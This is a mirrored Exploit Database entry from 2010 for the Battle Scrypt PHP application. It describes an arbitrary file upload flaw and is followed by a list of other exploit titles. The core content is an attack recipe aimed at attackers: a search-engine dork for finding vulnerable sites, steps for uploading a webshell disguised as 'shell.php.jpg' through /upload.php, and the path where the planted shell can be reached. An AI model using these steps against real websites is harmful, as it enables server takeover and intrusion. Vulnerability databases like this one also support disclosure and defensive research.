Battle Scrypt – Arbitrary File Upload

Exploit Database
74 阅读

作者： DigitALL

日期： 2010-05-19
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12656/

 # Exploit Title: Battle Scrypt Shell Upload Vulnerability

# Date: 19.05.2010

# Author: DigitALL

# Software Link:
http://www.scrypted.com/battlescrypt.html

# Tested on: Windows Xp Sp3

# Code :

d0rk: "Powered by Battle Scrypt" or inurl:upload.php For Script Kidde :)

Exploit: Go To /upload.php Your Shell shell.php.jpg And Shell Upload.And
Display* stats.php?id=[id]*

Your Shell Link : /images/uploads/[id].php

Gr33tz Thanks: Efe KroNicKq NoFearx38 and All 1923Turk.Com Members

Site's: // www.digitallsecurity.org // digit4ll.blogspot.com //
www.hacker-zone.org // www.katliam.org // www.sirperdesi.org //
www.kankardes.com //

last Exploits
Battle Scrypt – Arbitrary File Upload的更多信息

Adobe ColdFusion 2018 – Arbitrary File Upload：
Interview Management System 1.0 – Stored XSS in Add New Question：
HRSALE The Ultimate HRM 1.0.2 – ‘award_id’ SQL Injection：
Joomla! Component Card View JX – Cross-Site Scripting：
PBBoard – ‘admin.php?xml_name’ Arbitrary PHP Code Execution：
MunkyScripts Simple Gallery – SQL Injection：
InfraPower PPS-02-S Q213V1 – Remote Command Execution：
OpenEMR 5.0.1 – Remote Code Execution (Authenticated) (2)：